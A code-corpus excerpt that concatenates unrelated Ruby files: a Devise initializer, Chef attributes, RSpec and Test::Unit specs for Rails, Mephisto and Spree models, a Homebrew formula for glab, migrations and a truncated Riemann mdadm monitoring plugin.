delete '/todos/destroy_all', to: 'todos#destroy_all'
resources :todos, only: %i[index show create update destroy]
end
end
end
| 27.235294 | 102 | 0.682505 |
1da32572638adcea8bb7f7a4146fef19f3eea456 | 14,457 | # frozen_string_literal: true
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = 'de4523d6a800191feae0f0db1406e146468898e4155a39d2a8ab06e24c04a2f74b9e961e5aa66bf70393bbf5a6e4260ceafbef0ac963aee7365f0e6e0f28b409'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '8897b51046f1d86bbac8c706a930836f2e17d6b8abd54183a20771c22c6f165a1ee54913552538100331e24188ddc4f8c72a59703e3de1cf0214d228ef21a933'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.19 | 154 | 0.751262 |
3871785da1241248bb6c8fc5474986bd8dd4291a | 741 | default['openstack']['network']['tun_network_bridge_interface'] = 'lo'
default['openstack']['network']['provider_network_interface'] = 'lo'
default['sample']['network']['dns'] = '1.1.1.1'
default['sample']['network']['provider']['subnet'] = '192.168.57.0/24'
default['sample']['network']['provider']['gateway'] = '192.168.57.2'
default['sample']['network']['provider']['start'] = '192.168.57.5'
default['sample']['network']['provider']['end'] = '192.168.57.25'
default['sample']['network']['selfservice']['subnet'] = '172.16.0.0/24'
default['sample']['network']['selfservice']['gateway'] = '172.16.0.1'
default['sample']['network']['selfservice']['start'] = '172.16.0.5'
default['sample']['network']['selfservice']['end'] = '172.16.0.25'
| 49.4 | 71 | 0.646424 |
e27985392ac0f5da4f2036ffbcff58a937f4ccb0 | 1,353 | require 'rails_helper'
RSpec.describe Track, type: :model do
describe 'Validations' do
let(:user) { create :user }
let(:activ) { create :activ, user: user }
it 'has a valid factory' do
track = build :track, activ: activ
expect(track).to be_valid
end
it 'has a valid name' do
track = build :track, activ: activ, name: ''
expect(track).not_to be_valid
expect(track.errors[:name]).to include("can't be blank")
end
it 'has a valid distance' do
track = build :track, activ: activ, distance: nil
expect(track).not_to be_valid
expect(track.errors[:distance]).to include("can't be blank")
end
it 'has a valid duration' do
track = build :track, activ: activ, duration: nil
expect(track).not_to be_valid
expect(track.errors[:duration]).to include("can't be blank")
end
it 'has a valid repeat' do
tracking = build :track, activ: activ, repeat: nil
expect(tracking).not_to be_valid
expect(tracking.errors[:repeat]).to include("can't be blank")
end
it { should validate_presence_of(:name) }
it { should validate_presence_of(:duration) }
it { should validate_presence_of(:distance) }
it { should validate_presence_of(:repeat) }
end
describe 'Associations' do
it { should belong_to(:activ) }
end
end
| 28.787234 | 67 | 0.651146 |
912e8fe64d2b992aeaa20e6322b9e11199d3d24f | 1,601 | class Glab < Formula
desc "Open-source GitLab command-line tool"
homepage "https://glab.readthedocs.io/"
url "https://github.com/profclems/glab/archive/v1.18.1.tar.gz"
sha256 "ce10c93268eb58fa6d277ebd4ed6de254e4365a1a332122f597e295cc11496c3"
license "MIT"
revision 1
head "https://github.com/profclems/glab.git", branch: "trunk"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "b3053ed3b503f358326ee09ece85d31b6659835e7b35c23eb5e5e2e62e0a491a"
sha256 cellar: :any_skip_relocation, big_sur: "9a2f3821984bc6c24571cc7461be8f84cea8bfaecc78f5900ba34bc2b33e8397"
sha256 cellar: :any_skip_relocation, catalina: "c48bbd22fc04d942edc8b0041bbdaf3c095c040d47a33f4f1223da67341f867f"
sha256 cellar: :any_skip_relocation, mojave: "737ba02ba0bf3fb7c6f126b87cf0d3b265b22ba2c282f4ae582b3d2139341720"
end
depends_on "go" => :build
def install
on_macos { ENV["CGO_ENABLED"] = "1" }
system "make", "GLAB_VERSION=#{version}"
bin.install "bin/glab"
(bash_completion/"glab").write Utils.safe_popen_read(bin/"glab", "completion", "--shell=bash")
(zsh_completion/"_glab").write Utils.safe_popen_read(bin/"glab", "completion", "--shell=zsh")
(fish_completion/"glab.fish").write Utils.safe_popen_read(bin/"glab", "completion", "--shell=fish")
end
test do
system "git", "clone", "https://gitlab.com/profclems/test.git"
cd "test" do
assert_match "Clement Sam", shell_output("#{bin}/glab repo contributors")
assert_match "This is a test issue", shell_output("#{bin}/glab issue list --all")
end
end
end
| 43.27027 | 122 | 0.738289 |
876a4471ab0bcd212b6ab0b20aae8e9d71009f18 | 176 | module FreeThePaf
class App < Padrino::Application
register Padrino::Rendering
register Padrino::Mailer
register Padrino::Helpers
enable :sessions
end
end
| 17.6 | 34 | 0.732955 |
61695758a2681e901f1715cb0154c292ebc82a24 | 327 | # frozen_string_literal: true
module SimpleForm
module Inputs
class RichTextAreaInput < Base
def input(wrapper_options = nil)
merged_input_options = merge_wrapper_options(input_html_options, wrapper_options)
@builder.rich_text_area(attribute_name, merged_input_options)
end
end
end
end
| 25.153846 | 89 | 0.752294 |
623a30c66b6b708d15e953219912ca09c57c838c | 14,161 | require File.dirname(__FILE__) + '/../test_helper'
class UrlFiltersTest < ActiveSupport::TestCase
fixtures :sites, :sections, :contents
include CoreFilters, UrlFilters
def setup
@context = mock_context 'site' => sites(:first).to_liquid, 'section' => sections(:about).to_liquid
end
test "should generate archive url" do
assert_equal "/archives", archive_url(sections(:home).to_liquid)
assert_equal "/archives/foo/bar", archive_url(sections(:home).to_liquid, 'foo', 'bar')
end
test "should generate monthly url from date" do
assert_equal "/archives/2006/1", monthly_url(sections(:home).to_liquid, Date.new(2006, 1))
assert_equal "/about/archives/2006/1", monthly_url(sections(:about).to_liquid, Date.new(2006, 1))
end
test "should generate monthly url from time" do
assert_equal "/archives/2006/1", monthly_url(sections(:home).to_liquid, Time.utc(2006, 1))
assert_equal "/about/archives/2006/1", monthly_url(sections(:about).to_liquid, Time.utc(2006, 1))
end
test "should generate monthly url from string" do
assert_equal "/archives/2006/1", monthly_url(sections(:home).to_liquid, '2006-1')
assert_equal "/about/archives/2006/1", monthly_url(sections(:about).to_liquid, '2006-1-4')
end
test "should generate monthly link" do
assert_equal "<a href=\"/archives/2006/1\" title=\"January 2006\">January 2006</a>", link_to_month(sections(:home).to_liquid, '2006-1')
end
test "should generate paged url" do
assert_equal "/about", page_url(contents(:welcome).to_liquid(:page => true))
assert_equal "/about/welcome-to-mephisto", page_url(contents(:welcome).to_liquid)
assert_equal "/about/about-this-page", page_url(contents(:about).to_liquid)
end
test "should generate paged url when site has paged home section" do
@context = mock_context 'site' => sites(:hostess).to_liquid, 'section' => sections(:cupcake_home).to_liquid
assert_equal "/", page_url(contents(:cupcake_welcome).to_liquid(:page => true))
assert_equal "/welcome-to-cupcake", page_url(contents(:cupcake_welcome).to_liquid)
end
test "should generate paged url for home section" do
assert_equal "/", page_url(contents(:welcome).to_liquid(:page => true), sections(:home).to_liquid)
assert_equal "/welcome-to-mephisto", page_url(contents(:welcome).to_liquid, sections(:home).to_liquid)
end
test "should generate section links" do
other_section = link_to_section(sections(:home).to_liquid)
home_section = link_to_section(sections(:about).to_liquid)
assert_match %r(href="/"), other_section
assert_match %r(href="/about"), home_section
assert_match %r(class="selected"), home_section
assert_no_match %r(class="selected"), other_section
assert_match %r(title="#{sections(:home).name}"), other_section
assert_match %r(title="#{sections(:about).name}"), home_section
end
test "should generate asset urls" do
assert_equal "/javascripts/foo.js", javascript_url('foo.js')
assert_equal "/stylesheets/foo.css", stylesheet_url('foo.css')
assert_equal "/images/foo.gif", asset_url('foo.gif')
end
test "should include javascript tag" do
script = javascript('foo')
assert_match /^<script/, script
assert_match %r(src="/javascripts/foo.js"), script
end
test "should link stylesheet tag" do
css = stylesheet('foo')
assert_match /^<link/, css
assert_match %r(href="/stylesheets/foo.css"), css
end
test "should create image tag" do
img = img_tag('foo.gif')
assert_match /^<img/, img
assert_match %r(src="/images/foo.gif"), img
assert_match %r(alt="foo"), img
end
test "should generate tag urls" do
assert_equal "/tags", tag_url
assert_equal "/tags/foo", tag_url('foo')
assert_equal "/tags/foo/bar", tag_url('foo', 'bar')
assert_equal '/tags/foo%20bar', tag_url('foo bar')
end
test "should generate tag links" do
assert_equal "<a href=\"/tags/foo\" rel=\"tag\" title=\"foo\">foo</a>", link_to_tag('foo')
end
test "should generate search urls" do
assert_equal '/search?q=abc', search_url('abc')
assert_equal '/search?q=abc&page=2', search_url('abc', 2)
end
test "should generate atom auto discovery tag" do
content = atom_feed('/feed/foo')
assert_match /^<link /, content
assert_match /rel="alternate"/, content
assert_match /type="application\/atom\+xml"/, content
assert_match /href="\/feed\/foo"/, content
assert_no_match /title/, content
end
test "should generate atom auto discovery tag with title" do
content = atom_feed('foo', 'bar')
assert_match /title="bar"/, content
end
test "should show all comments feed" do
content = all_comments_feed
assert_match /href="\/feed\/all_comments.xml"/, content
assert_match /title="All Comments"/, content
end
test "should show all comments feed with custom title" do
content = all_comments_feed "All Lame Comments"
assert_match /title="All Lame Comments"/, content
end
test "should show section comments feed" do
content = comments_feed(sections(:home).to_liquid)
assert_match /href="\/feed\/comments.xml"/, content
assert_match /title="Comments for Home"/, content
end
test "should show section comments feed with custom title" do
content = comments_feed(sections(:about).to_liquid, "About Comments")
assert_match /href="\/feed\/about\/comments.xml"/, content
assert_match /title="About Comments"/, content
end
test "should show section articles feed" do
content = articles_feed(sections(:home).to_liquid)
assert_match /href="\/feed\/atom.xml"/, content
assert_match /title="Articles for Home"/, content
end
test "should show section articles feed with custom title" do
content = articles_feed(sections(:about).to_liquid, "About Articles")
assert_match /href="\/feed\/about\/atom.xml"/, content
assert_match /title="About Articles"/, content
end
test "should html encode anchor text" do
unencoded = 'Tom & Jerry'
contents(:welcome).title = unencoded
@article = contents(:welcome).to_liquid
@article.context = @context
@context['section'].instance_variable_get(:@liquid)['name'] = unencoded
assert_match %r{>Tom & Jerry<\/a>}, link_to_article(@article)
assert_match %r{>Tom & Jerry<\/a>}, link_to_page(@article)
assert_match %r{>Tom & Jerry<\/a>}, link_to_section(@context['section'])
assert_match %r{>Tom & Jerry<\/a>}, link_to_tag(unencoded)
end
test "should link to search result with article link" do
@article = contents(:welcome).to_liquid
@article.context = @context
@context['section'] = nil
assert_match /href="\/\d{4}\/\d+\/\d+\/welcome-to-mephisto"/, link_to_search_result(@article)
end
test "should link to search result with page link" do
@article = contents(:welcome).to_liquid(:page => true)
@article.context = @context
@article2 = contents(:another).to_liquid
@article2.context = @context
assert_match /href="\/about"/, link_to_search_result(@article)
assert_match /href="\/about\/another-welcome-to-mephisto"/, link_to_search_result(@article2)
end
end
class LinkToUrlFiltersTest < ActiveSupport::TestCase
fixtures :sites, :sections, :contents
include CoreFilters, UrlFilters
def setup
@context = mock_context 'site' => sites(:first).to_liquid
@section = sections(:about).to_liquid
@article = contents(:welcome).to_liquid
@paged_article = contents(:about).to_liquid
@article.context = @paged_article.context = @context
end
test "should generate links with custom text" do
pattern = %r(^<a href="[^"]+" (?:rel="tag" )?title="Custom text">Custom text</a>$)
args = 'Custom text'
assert_match pattern, link_to_article(@article, args)
assert_match pattern, link_to_page(@article, @section, args)
assert_match pattern, link_to_section(@section, args)
assert_match pattern, link_to_comments(@article, args)
assert_match pattern, link_to_tag('foo', args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', args)
assert_match pattern, link_to_search_result(@article, args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, args)
end
test "should generate links with custom title attribute" do
pattern = %r(^<a href="[^"]+" (?:rel="tag" )?title="Custom title">)
args = [nil, 'Custom title']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate links with custom id attribute" do
pattern = %r(^<a href="[^"]+" id="custom-id" (?:rel="tag" )?title="[^"]+">)
args = [nil, nil, 'custom-id']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate links with custom class attribute" do
pattern = %r(^<a class="custom-class" href="[^"]+" (?:rel="tag" )?title="[^"]+">)
args = [nil, nil, nil, 'custom-class']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate links with custom rel attribute" do
pattern = %r(^<a href="[^"]+" rel="custom-rel" title="[^"]+">)
args = [nil, nil, nil, nil, 'custom-rel']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should html encode custom attributes" do
pattern = %r(^<a class="custom&class" href="[^"]+" id="custom&id" rel="custom&rel" title="Custom & title">Custom & text</a>$)
args = ['Custom & text', 'Custom & title', 'custom&id', 'custom&class', 'custom&rel']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate page links with selected class appended to custom class attribute" do
pattern = %r(class="custom-class selected")
args = [nil, nil, nil, 'custom-class']
@context['section'] = @section
@context['article'] = @paged_article
assert_match pattern, link_to_page(@paged_article, @section, *args)
assert_no_match pattern, link_to_page(@article, @section, *args)
end
test "should generate section links with selected class appended to custom class attribute" do
pattern = %r(class="custom-class selected")
args = [nil, nil, nil, 'custom-class']
@context['section'] = @section
assert_match pattern, link_to_section(@section, *args)
assert_no_match pattern, link_to_section(sections(:home).to_liquid, *args)
end
end
class ArticleUrlFiltersTest < ActiveSupport::TestCase
fixtures :sites, :sections, :contents
include CoreFilters, UrlFilters
def setup
@context = mock_context 'site' => sites(:first).to_liquid
@article = contents(:welcome).to_liquid
@article.context = @context
@permalink = @article.url
end
test "should show article comments feed" do
content = comments_feed(@article)
assert_match /href="#{@permalink}\/comments\.xml"/, content
assert_match /title="Comments for Welcome to Mephisto"/, content
end
test "should show article comments feed with custom title" do
content = comments_feed(@article, "Welcome Comments")
assert_match /title="Welcome Comments"/, content
end
test "should show article changes feed" do
content = changes_feed(@article)
assert_match /href="#{@permalink}\/changes\.xml"/, content
assert_match /title="Changes for Welcome to Mephisto"/, content
end
test "should show article changes feed with custom title" do
content = changes_feed(@article, "Welcome Changes")
assert_match /title="Welcome Changes"/, content
end
end
| 42.525526 | 149 | 0.694513 |
87cc1cc4397f5b551761bcb8a0dd8c42812261ee | 175 | class NewsNotification < ActiveRecord::Base
validates_presence_of :title, :body
default_scope -> { order(updated_at: :desc) }
scope :active, -> { where(active: true) }
end
| 29.166667 | 46 | 0.731429 |
0166856d11dfe30e4ba55821f3fc396aaa241396 | 425 | module NLBSG
class GetAvailabilityInfoResponse < ResponseBase
def initialize(response)
super(response.to_hash[:get_availability_info_response])
end
def next_record_position
@response[:next_record_position]
end
def set_id
@response[:set_id]
end
def items
wrap_in_array(@response.dig(:items, :item))
end
def fetch_next_records
p "TODO"
end
end
end
| 17 | 62 | 0.677647 |
61a750bb5caab6b3a7d4dcd4e8cd0cc42d676fae | 136 | class AddRedcapIdToParticipants < ActiveRecord::Migration[6.0]
def change
add_column :participants, :redcap_id, :string
end
end
| 22.666667 | 62 | 0.772059 |
61991c3989107aa89101b3de7a6c6b9df9d722dd | 217 | class AddOmniauthToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :provider, :string
add_index :users, :provider
add_column :users, :uid, :string
add_index :users, :uid
end
end
| 24.111111 | 55 | 0.705069 |
6aed7bd44a7dcf83e30d572a2ffc91c6cecfef34 | 53 | module Mtg
class Setting < Sequel::Model
end
end
| 10.6 | 31 | 0.716981 |
2114843b6c41fa6df5333d6eae01e4f827d557a5 | 755 | #! /usr/bin/jruby
# -*- coding: utf-8 -*-
#
# hsqldb_update.rb
#
# Jan/29/2015
# ------------------------------------------------------------
#
include Java
import java.sql.DriverManager
import java.lang.System
#
require 'date'
#
load '/var/www/data_base/common/jruby_common/jruby_sql_manipulate.rb'
#
# ------------------------------------------------------------
puts "*** 開始 ***"
#
#
id_in = ARGV[0]
population_in = ARGV[1].to_i
#
puts id_in,population_in
#
str_connect = "jdbc:hsqldb:file:/var/tmp/hsqldb/cities;shutdown=true"
#
conn = DriverManager.getConnection(str_connect,"SA", "")
sql_update_proc(conn,id_in,population_in)
sql_read_proc(conn)
conn.close()
#
puts "*** 終了 ***"
#
# ------------------------------------------------------------
| 19.868421 | 69 | 0.528477 |
ffe9b4fb4cad96f6894648765e90a651e9085901 | 590 | require 'spec_helper'
describe 'rabbitmq::policy_management' do
let(:runner) { ChefSpec::ServerRunner.new(REDHAT_OPTS) }
let(:node) { runner.node }
let(:chef_run) do
runner.converge(described_recipe)
end
let(:file_cache_path) { Chef::Config[:file_cache_path] }
it 'includes the `default` recipe' do
expect(chef_run).to include_recipe('rabbitmq::default')
end
it 'sets a rabbitmq policy ha-all' do
expect(chef_run).to set_rabbitmq_policy('ha-all')
end
it 'sets a rabbitmq policy ha-two' do
expect(chef_run).to set_rabbitmq_policy('ha-two')
end
end
| 24.583333 | 59 | 0.716949 |
e982a7df162dad9c055d471bff30041dc6966aa0 | 2,172 | # coding: UTF-8
require 'spec_helper'
describe Spree::Taxon, :type => :model do
let(:taxon) { FactoryGirl.build(:taxon, :name => "Ruby on Rails") }
describe '#to_param' do
subject { super().to_param }
it { is_expected.to eql taxon.permalink }
end
context "set_permalink" do
it "should set permalink correctly when no parent present" do
taxon.set_permalink
expect(taxon.permalink).to eql "ruby-on-rails"
end
it "should support Chinese characters" do
taxon.name = "你好"
taxon.set_permalink
expect(taxon.permalink).to eql 'ni-hao'
end
context "with parent taxon" do
let(:parent) { FactoryGirl.build(:taxon, :permalink => "brands") }
before { allow(taxon).to receive_messages parent: parent }
it "should set permalink correctly when taxon has parent" do
taxon.set_permalink
expect(taxon.permalink).to eql "brands/ruby-on-rails"
end
it "should set permalink correctly with existing permalink present" do
taxon.permalink = "b/rubyonrails"
taxon.set_permalink
expect(taxon.permalink).to eql "brands/rubyonrails"
end
it "should support Chinese characters" do
taxon.name = "我"
taxon.set_permalink
expect(taxon.permalink).to eql "brands/wo"
end
# Regression test for #3390
context "setting a new node sibling position via :child_index=" do
let(:idx) { rand(0..100) }
before { allow(parent).to receive(:move_to_child_with_index) }
context "taxon is not new" do
before { allow(taxon).to receive(:new_record?).and_return(false) }
it "passes the desired index move_to_child_with_index of :parent " do
expect(taxon).to receive(:move_to_child_with_index).with(parent, idx)
taxon.child_index = idx
end
end
end
end
end
# Regression test for #2620
context "creating a child node using first_or_create" do
let(:taxonomy) { create(:taxonomy) }
it "does not error out" do
taxonomy.root.children.unscoped.where(:name => "Some name").first_or_create
end
end
end
| 28.96 | 81 | 0.649632 |
03dad98a20638346595b490a37c8233d363c06f3 | 1,581 | class Riemann::Babbler::Plugin::Mdadm < Riemann::Babbler::Plugin
def init
plugin.set_default(:service, 'mdadm')
plugin.set_default(:interval, 60)
plugin.states.set_default(:critical, 1)
end
def run_plugin
File.exists? '/proc/mdstat'
end
def rm_bracket(text)
text.gsub('[', '').gsub(']', '')
end
def mdadm_status_well?(text)
text.gsub(/U/, '').empty?
end
def collect
file = File.read('/proc/mdstat').split("\n")
status = Array.new
file.each_with_index do |line, index|
next unless line.include?('blocks')
device = file[index-1].split(':')[0].strip
mdstatus = rm_bracket(line.split(' ').last) # UUU
next if mdadm_status_well?(mdstatus) # пропускаем все збс
if mdstatus == plugin.states.send(device).to_s # пропускаем если стейт зафикисирован в конфиге
status << { :service => plugin.service + " #{device}", :metric => 1, :state => 'ok', :description => "mdadm failed device #{device}, but disabled in config" }
next
end
status << { :service => plugin.service + " #{device}", :metric => 1, :description => "mdadm failed device #{device}: #{get_failed_parts(device)}" }
end
status
end
def get_failed_parts (device)
begin
failed_parts = []
Dir["/sys/block/#{device}/md/dev-*"].each do |p|
